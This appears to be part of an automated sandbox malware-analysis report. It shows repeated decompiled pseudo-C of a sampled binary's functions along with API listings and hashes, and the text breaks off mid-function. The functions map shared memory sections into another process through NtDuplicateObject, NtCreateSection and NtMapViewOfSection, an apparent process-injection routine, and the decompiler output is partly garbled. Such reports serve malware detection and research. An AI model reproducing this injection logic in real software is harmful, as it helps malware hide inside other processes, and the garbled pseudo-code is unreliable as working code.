					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				_v96 = _t87;
				_t183 =  &_v100;
				 *_t183 = _t176;
				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t183);
				_t90 =  *_t183;
				if(_t90 != 0) {
					_t132 =  &_v52;
					 *_t132 = _t90;
					 *(_t132 + 4) = _t176;
					_t184 =  &_v44;
					 *((intOrPtr*)(_t127 + 0x10))(_t184, 0x18);
					 *_t184 = 0x18;
					_push( &_v52);
					_push(_t184);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t176, _t176, 2) == 0) {
						_v12 = _t176;
						_t97 =  &_v84;
						 *(_t97 + 4) = _t176;
						 *_t97 = 0x5000;
						_t185 =  &_v88;
						if(NtCreateSection(_t185, 6, _t176, _t97, 4, 0x8000000, _t176) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t121 =  &_v72;
							 *_t121 = _t176;
							if(NtMapViewOfSection( *_t185, 0xffffffff, _t121, _t176, _t176, _t176,  &_v60, 1, _t176, 4) == 0) {
								_t123 =  &_v64;
								 *_t123 = _t176;
								if(NtMapViewOfSection( *_t185, _v16, _t123, _t176, _t176, _t176,  &_v60, 1, _t176, 4) == 0) {
									_t199 = _v72;
									 *((intOrPtr*)(_t127 + 0x20))(_t176, _t199, 0x104);
									 *((intOrPtr*)(_t199 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t99 =  &_v84;
						 *(_t99 + 4) = _t176;
						 *_t99 = _a12 + 0x10000;
						_t186 =  &_v92;
						_t100 = NtCreateSection(_t186, 0xe, _t176, _t99, 0x40, 0x8000000, _t176);
						if (_t100 != 0) goto L67;
						 *_t100 =  *_t100 + _t100;
					}
				}
				_push(0x15a4);
				_t91 =  *_t201;
				_push(0x83);
				L004011F5(_t176, _t226);
				return _t91;
			}

0x00401578
0x00401580
0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164b
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.379636129.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
Instruction ID: 4afb5ad6e9f78dbb0f0fc4dd380045413720c66cee1019041566b0107d6eeca4
Opcode Fuzzy Hash: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
Instruction Fuzzy Hash: 2F615E71900208FBEB209F91CC49FAF7BB8EF85B14F10412AF912BA1E5D6749901DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00401564 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00401564(void* __eax, void* __edx, void* __esi) {
				intOrPtr _t89;
				struct _EXCEPTION_RECORD _t92;
				intOrPtr _t93;
				struct _GUID _t99;
				struct _GUID _t101;
				long _t102;
				PVOID* _t123;
				PVOID* _t125;
				intOrPtr _t129;
				struct _EXCEPTION_RECORD* _t135;
				void* _t179;
				struct _EXCEPTION_RECORD _t180;
				struct _EXCEPTION_RECORD* _t190;
				intOrPtr* _t192;
				HANDLE* _t193;
				HANDLE* _t194;
				void* _t207;
				void* _t208;
				void* _t210;
				intOrPtr* _t211;
				void* _t216;

				_t216 = __eax + 0x15a4b8;
				_push(0x387);
				_t211 = _t210 + 4;
				_push(0x83);
				L004011F5(_t179, _t216);
				_t129 =  *((intOrPtr*)(_t208 + 8));
				_t180 = 0;
				 *((intOrPtr*)(_t208 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t208 - 0x34)) =  *((intOrPtr*)(_t208 - 0x34)) + 1;
				}
				while(1) {
					_t89 =  *((intOrPtr*)(_t129 + 0x48))();
					if(_t89 != 0) {
						break;
					}
					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t208 - 0x5c)) = _t89;
				_t190 = _t208 - 0x60;
				 *_t190 = _t180;
				 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t190);
				_t92 =  *_t190;
				if(_t92 != 0) {
					_t135 = _t208 - 0x30;
					 *_t135 = _t92;
					 *(_t135 + 4) = _t180;
					_t192 = _t208 - 0x28;
					 *((intOrPtr*)(_t129 + 0x10))(_t192, 0x18);
					 *_t192 = 0x18;
					_push(_t208 - 0x30);
					_push(_t192);
					_push(0x40);
					_push(_t208 - 0x10);
					if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject( *(_t208 - 0x10), 0xffffffff, 0xffffffff, _t208 - 0xc, _t180, _t180, 2) == 0) {
						 *(_t208 - 8) = _t180;
						_t99 = _t208 - 0x50;
						 *(_t99 + 4) = _t180;
						 *_t99 = 0x5000;
						_t193 = _t208 - 0x54;
						if(NtCreateSection(_t193, 6, _t180, _t99, 4, 0x8000000, _t180) == 0) {
							 *_t25 =  *(_t208 - 0x50);
							_t123 = _t208 - 0x44;
							 *_t123 = _t180;
							if(NtMapViewOfSection( *_t193, 0xffffffff, _t123, _t180, _t180, _t180, _t208 - 0x38, 1, _t180, 4) == 0) {
								_t125 = _t208 - 0x3c;
								 *_t125 = _t180;
								if(NtMapViewOfSection( *_t193,  *(_t208 - 0xc), _t125, _t180, _t180, _t180, _t208 - 0x38, 1, _t180, 4) == 0) {
									_t207 =  *(_t208 - 0x44);
									 *((intOrPtr*)(_t129 + 0x20))(_t180, _t207, 0x104);
									 *((intOrPtr*)(_t207 + 0x208)) =  *((intOrPtr*)(_t208 + 0x14));
									 *(_t208 - 8) =  *(_t208 - 8) + 1;
								}
							}
						}
						_t101 = _t208 - 0x50;
						 *(_t101 + 4) = _t180;
						 *_t101 =  *((intOrPtr*)(_t208 + 0x10)) + 0x10000;
						_t194 = _t208 - 0x58;
						_t102 = NtCreateSection(_t194, 0xe, _t180, _t101, 0x40, 0x8000000, _t180);
						if (_t102 != 0) goto L66;
						 *_t102 =  *_t102 + _t102;
					}
				}
				_push(0x15a4);
				_t93 =  *_t211;
				_push(0x83);
				L004011F5(_t180, _t237);
				return _t93;
			}

0x00401566
0x00401578
0x00401580
0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.379636129.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
Instruction ID: 3c61d4fa49215657d74707620d36eaa57d50516e3f831c539a14d6838cb40392
Opcode Fuzzy Hash: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
Instruction Fuzzy Hash: 23513CB1900249FBEB209F91CC49FAF7BB8EF85710F14412AF911BA1E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401577 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00401577() {
				intOrPtr _t86;
				struct _EXCEPTION_RECORD _t89;
				intOrPtr _t90;
				struct _GUID _t96;
				struct _GUID _t98;
				long _t99;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t126;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t184;
				intOrPtr* _t186;
				HANDLE* _t187;
				HANDLE* _t188;
				void* _t201;
				void* _t202;
				void* _t204;
				intOrPtr* _t205;
				void* _t210;

				asm("repe push 0x387");
				_push(0x387);
				_t205 = _t204 + 4;
				_push(0x83);
				L004011F5(_t175, _t210);
				_t126 =  *((intOrPtr*)(_t202 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t86 =  *((intOrPtr*)(_t126 + 0x48))();
					if(_t86 != 0) {
						break;
					}
					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t86;
				_t184 = _t202 - 0x60;
				 *_t184 = _t176;
				 *((intOrPtr*)(_t126 + 0x4c))(_t86, _t184);
				_t89 =  *_t184;
				if(_t89 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t89;
					 *(_t132 + 4) = _t176;
					_t186 = _t202 - 0x28;
					 *((intOrPtr*)(_t126 + 0x10))(_t186, 0x18);
					 *_t186 = 0x18;
					_push(_t202 - 0x30);
					_push(_t186);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t202 - 8) = _t176;
						_t96 = _t202 - 0x50;
						 *(_t96 + 4) = _t176;
						 *_t96 = 0x5000;
						_t187 = _t202 - 0x54;
						if(NtCreateSection(_t187, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t202 - 0x50);
							_t120 = _t202 - 0x44;
							 *_t120 = _t176;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t120, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
								_t122 = _t202 - 0x3c;
								 *_t122 = _t176;
								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t122, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t126 + 0x20))(_t176, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *(_t202 - 8) =  *(_t202 - 8) + 1;
								}
							}
						}
						_t98 = _t202 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
						_t188 = _t202 - 0x58;
						_t99 = NtCreateSection(_t188, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
						if (_t99 != 0) goto L63;
						 *_t99 =  *_t99 + _t99;
					}
				}
				_push(0x15a4);
				_t90 =  *_t205;
				_push(0x83);
				L004011F5(_t176, _t231);
				return _t90;
			}

0x00401577
0x00401578
0x00401580
0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.379636129.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
Instruction ID: ba3189e89dbc592d8eefb072767128172b6b3105eb2a85c49d1307986ab5c8dd
Opcode Fuzzy Hash: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
Instruction Fuzzy Hash: 9D511B71900249BFEB209F91CC48FAF7BB8FF85B14F10412AFA11BA1E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401523 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00401523(void* __eax, void* __esi, void* __eflags) {
				long _t89;
				long _t92;
				intOrPtr _t93;
				struct _GUID _t99;
				long _t100;
				struct _GUID _t101;
				long _t102;
				PVOID* _t123;
				long _t124;
				PVOID* _t125;
				long _t126;
				intOrPtr _t129;
				long* _t134;
				void* _t176;
				struct _EXCEPTION_RECORD _t177;
				struct _EXCEPTION_RECORD* _t187;
				intOrPtr* _t189;
				HANDLE* _t190;
				HANDLE* _t191;
				void* _t204;
				void* _t205;
				intOrPtr* _t207;

				asm("outsd");
				asm("out 0x70, al");
				if(__eflags > 0) {
					L004011F5(_t176, __eflags);
					_t129 =  *((intOrPtr*)(_t205 + 8));
					_t177 = 0;
					 *(_t205 - 0x34) = 0;
					__eflags = gs;
					if(gs != 0) {
						_t4 = _t205 - 0x34;
						 *_t4 =  *(_t205 - 0x34) + 1;
						__eflags =  *_t4;
					}
					while(1) {
						_t89 =  *((intOrPtr*)(_t129 + 0x48))();
						__eflags = _t89;
						if(_t89 != 0) {
							break;
						}
						 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
					}
					 *(_t205 - 0x5c) = _t89;
					_t187 = _t205 - 0x60;
					 *_t187 = _t177;
					 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t187);
					_t92 =  *_t187;
					__eflags = _t92;
					if(__eflags != 0) {
						_t134 = _t205 - 0x30;
						 *_t134 = _t92;
						_t134[1] = _t177;
						_t189 = _t205 - 0x28;
						 *((intOrPtr*)(_t129 + 0x10))(_t189, 0x18);
						 *_t189 = 0x18;
						__eflags =  *((intOrPtr*)(_t129 + 0x70))(_t205 - 0x10, 0x40, _t189, _t205 - 0x30);
						if(__eflags == 0) {
							__eflags = NtDuplicateObject( *(_t205 - 0x10), 0xffffffff, 0xffffffff, _t205 - 0xc, _t177, _t177, 2);
							if(__eflags == 0) {
								 *(_t205 - 8) = _t177;
								_t99 = _t205 - 0x50;
								 *(_t99 + 4) = _t177;
								 *_t99 = 0x5000;
								_t190 = _t205 - 0x54;
								_t100 = NtCreateSection(_t190, 6, _t177, _t99, 4, 0x8000000, _t177);
								__eflags = _t100;
								if(_t100 == 0) {
									 *_t26 =  *(_t205 - 0x50);
									_t123 = _t205 - 0x44;
									 *_t123 = _t177;
									_t124 = NtMapViewOfSection( *_t190, 0xffffffff, _t123, _t177, _t177, _t177, _t205 - 0x38, 1, _t177, 4);
									__eflags = _t124;
									if(_t124 == 0) {
										_t125 = _t205 - 0x3c;
										 *_t125 = _t177;
										_t126 = NtMapViewOfSection( *_t190,  *(_t205 - 0xc), _t125, _t177, _t177, _t177, _t205 - 0x38, 1, _t177, 4);
										__eflags = _t126;
										if(_t126 == 0) {
											_t204 =  *(_t205 - 0x44);
											 *((intOrPtr*)(_t129 + 0x20))(_t177, _t204, 0x104);
											 *((intOrPtr*)(_t204 + 0x208)) =  *((intOrPtr*)(_t205 + 0x14));
											_t38 = _t205 - 8;
											 *_t38 =  *(_t205 - 8) + 1;
											__eflags =  *_t38;
										}
									}
								}
								_t101 = _t205 - 0x50;
								 *(_t101 + 4) = _t177;
								 *_t101 =  *((intOrPtr*)(_t205 + 0x10)) + 0x10000;
								_t191 = _t205 - 0x58;
								_t102 = NtCreateSection(_t191, 0xe, _t177, _t101, 0x40, 0x8000000, _t177);
								__eflags = _t102;
								if (_t102 != 0) goto L60;
								 *_t102 =  *_t102 + _t102;
								__eflags =  *_t102;
							}
						}
					}
					_push(0x15a4);
					_t93 =  *_t207;
					_push(0x83);
					L004011F5(_t177, __eflags);
					return _t93;
				} else {
					asm("popfd");
					asm("repe add al, 0x9b");
					asm("wait");
					asm("wait");
					return __esi;
				}
			}

0x00401523
0x00401524
0x00401527
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015af
0x004015b2
0x004015b4
0x004015b4
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015ba
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d1
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x00401600
0x00401602
0x0040161d
0x0040161f
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401644
0x00401647
0x00401649
0x0040164e
0x00401651
0x00401654
0x00401667
0x0040166a
0x0040166c
0x0040166e
0x00401671
0x00401685
0x00401688
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016c9
0x004016cb
0x004016cf
0x004016cf
0x004016cf
0x0040161f
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f
0x00401529
0x00401529
0x0040152a
0x0040152d
0x0040152e
0x0040152f
0x0040152f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685

Memory Dump Source

Source File: 00000000.00000002.379636129.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$CreateDuplicateObject
String ID:
API String ID: 3617974760-0
Opcode ID: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
Instruction ID: c9dca56e4daa214b2bd9150ebf0f157daf6c833c296841cdcd3f7df5e4c146b1
Opcode Fuzzy Hash: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
Instruction Fuzzy Hash: 91510A71900249BFEB209F92CC48F9FBBB8FF85B14F14411AFA11BA2A5D7749945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040158C Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E0040158C(void* __eax, void* __edi) {
				void* _t89;
				intOrPtr _t91;
				struct _EXCEPTION_RECORD _t94;
				intOrPtr _t95;
				struct _GUID _t101;
				struct _GUID _t103;
				long _t104;
				PVOID* _t125;
				PVOID* _t127;
				intOrPtr _t131;
				struct _EXCEPTION_RECORD* _t136;
				void* _t180;
				struct _EXCEPTION_RECORD _t181;
				struct _EXCEPTION_RECORD* _t189;
				intOrPtr* _t191;
				HANDLE* _t192;
				HANDLE* _t193;
				void* _t206;
				void* _t207;
				void* _t208;
				void* _t210;
				intOrPtr* _t211;
				intOrPtr _t216;

				_t211 = _t210 + 1;
				asm("clc");
				asm("stc");
				_t89 = _t207;
				_t208 = __eax;
				_t180 = __edi - 1;
				_t2 = _t89 - 0x7d;
				 *_t2 =  *((intOrPtr*)(_t89 - 0x7d));
				_t216 =  *_t2;
				_push(0x83);
				L004011F5(_t180, _t216);
				_t131 =  *((intOrPtr*)(__eax + 8));
				_t181 = 0;
				 *((intOrPtr*)(__eax - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(__eax - 0x34)) =  *((intOrPtr*)(__eax - 0x34)) + 1;
				}
				while(1) {
					_t91 =  *((intOrPtr*)(_t131 + 0x48))();
					if(_t91 != 0) {
						break;
					}
					 *((intOrPtr*)(_t131 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t208 - 0x5c)) = _t91;
				_t189 = _t208 - 0x60;
				 *_t189 = _t181;
				 *((intOrPtr*)(_t131 + 0x4c))(_t91, _t189);
				_t94 =  *_t189;
				if(_t94 != 0) {
					_t136 = _t208 - 0x30;
					 *_t136 = _t94;
					 *(_t136 + 4) = _t181;
					_t191 = _t208 - 0x28;
					 *((intOrPtr*)(_t131 + 0x10))(_t191, 0x18);
					 *_t191 = 0x18;
					_push(_t208 - 0x30);
					_push(_t191);
					_push(0x40);
					_push(_t208 - 0x10);
					if( *((intOrPtr*)(_t131 + 0x70))() == 0 && NtDuplicateObject( *(_t208 - 0x10), 0xffffffff, 0xffffffff, _t208 - 0xc, _t181, _t181, 2) == 0) {
						 *(_t208 - 8) = _t181;
						_t101 = _t208 - 0x50;
						 *(_t101 + 4) = _t181;
						 *_t101 = 0x5000;
						_t192 = _t208 - 0x54;
						if(NtCreateSection(_t192, 6, _t181, _t101, 4, 0x8000000, _t181) == 0) {
							 *_t28 =  *(_t208 - 0x50);
							_t125 = _t208 - 0x44;
							 *_t125 = _t181;
							if(NtMapViewOfSection( *_t192, 0xffffffff, _t125, _t181, _t181, _t181, _t208 - 0x38, 1, _t181, 4) == 0) {
								_t127 = _t208 - 0x3c;
								 *_t127 = _t181;
								if(NtMapViewOfSection( *_t192,  *(_t208 - 0xc), _t127, _t181, _t181, _t181, _t208 - 0x38, 1, _t181, 4) == 0) {
									_t206 =  *(_t208 - 0x44);
									 *((intOrPtr*)(_t131 + 0x20))(_t181, _t206, 0x104);
									 *((intOrPtr*)(_t206 + 0x208)) =  *((intOrPtr*)(_t208 + 0x14));
									 *(_t208 - 8) =  *(_t208 - 8) + 1;
								}
							}
						}
						_t103 = _t208 - 0x50;
						 *(_t103 + 4) = _t181;
						 *_t103 =  *((intOrPtr*)(_t208 + 0x10)) + 0x10000;
						_t193 = _t208 - 0x58;
						_t104 = NtCreateSection(_t193, 0xe, _t181, _t103, 0x40, 0x8000000, _t181);
						if (_t104 != 0) goto L60;
						 *_t104 =  *_t104 + _t104;
					}
				}
				_push(0x15a4);
				_t95 =  *_t211;
				_push(0x83);
				L004011F5(_t181, _t237);
				return _t95;
			}

0x0040158c
0x0040158d
0x0040158e
0x0040158f
0x0040158f
0x00401590
0x00401591
0x00401591
0x00401591
0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.379636129.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
Instruction ID: 02d2e3ac3767ea31e924919402f7a0ff100aaf9667a8aefd77e34752db93229b
Opcode Fuzzy Hash: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
Instruction Fuzzy Hash: C9513AB1900249BFEB209F92CC48F9FBBB8FF85B14F10415AFA11AA1E5D7749944CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00401585 Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00401585() {
				intOrPtr _t86;
				struct _EXCEPTION_RECORD _t89;
				intOrPtr _t90;
				struct _GUID _t96;
				struct _GUID _t98;
				long _t99;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t126;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t185;
				intOrPtr* _t187;
				HANDLE* _t188;
				HANDLE* _t189;
